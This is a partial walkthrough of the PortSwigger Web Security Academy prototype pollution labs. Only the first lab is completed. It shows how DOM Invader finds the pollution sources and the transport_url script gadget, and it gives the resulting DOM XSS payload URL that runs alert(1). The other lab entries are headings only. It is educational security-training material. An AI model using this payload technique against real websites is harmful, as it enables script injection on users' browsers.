IN PROGRESS: WebSecurityAcademy (PortSwigger) – Prototype pollution

Walk-through of the Prototype pollution vulnerabilities lab on PortSwigger Web Security Academy. Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.

Practitioner – DOM XSS via client-side prototype pollution
Practitioner – DOM XSS via an alternative prototype pollution vector
Practitioner – Client-side prototype pollution via flawed sanitization
Practitioner – Client-side prototype pollution in third-party libraries
Practitioner – Client-side prototype pollution via browser APIs
Practitioner – Privilege escalation via server-side prototype pollution
Practitioner – Detecting server-side prototype pollution without polluted property reflection
Practitioner – Bypassing flawed input filters for server-side prototype pollution
Practitioner – Remote code execution via server-side prototype pollution
Expert – Exfiltrating sensitive data via server-side prototype pollution

Practitioner – DOM XSS via client-side prototype pollution

Access the lab

This lab is vulnerable to DOM XSS via client-side prototype pollution. You can solve this lab manually in your browser, or use DOM Invader to help you.

Find a source that you can use to add arbitrary properties to the global Object.prototype

Use the search for term “whatever” and observe that the search term is displayed on the page.

Use the DOM Invader.
- Under Main settings, select DOM Invader is on.
- Under Attack types, select Prototype pollution is on.
Right-click on the page and choose Inspect.
Click on the DOM Invader tab.

We have 2 findings:

Prototype pollution: __proto__[property]=value in search (1)

Prototype pollution: constructor[prototype][property]=value in search (1)

Identify a gadget property that allows you to execute arbitrary JavaScript

Still on the DOM Invader tab, click on Scan for gadgets for the first finding (it opens a new tab). Nothing is found. Scan the second finding.

DOM Invader found 1 sink via prototype pollution.

Inspect the new opened tab. Under the DOM Invader tab, we find sink:

script.src (1)

<dom invader canari>2prototypepollutiontransport_url<dom invader canari>

Combine these to call alert()

Click on Exploit. The generated payload calls the alert function.

https://<LAB ID>.web-security-academy.net/?search=whatever&constructor[prototype][transport_url]=data:,alert(1)

Practitioner – DOM XSS via an alternative prototype pollution vector

Access the lab

Practitioner – Client-side prototype pollution via flawed sanitization

Access the lab

Practitioner – Client-side prototype pollution in third-party libraries

Access the lab

Practitioner – Client-side prototype pollution via browser APIs

Access the lab

Practitioner – Privilege escalation via server-side prototype pollution

Access the lab

Practitioner – Detecting server-side prototype pollution without polluted property reflection

Access the lab

Practitioner – Bypassing flawed input filters for server-side prototype pollution

Access the lab

Practitioner – Remote code execution via server-side prototype pollution

Access the lab

Expert – Exfiltrating sensitive data via server-side prototype pollution

Access the lab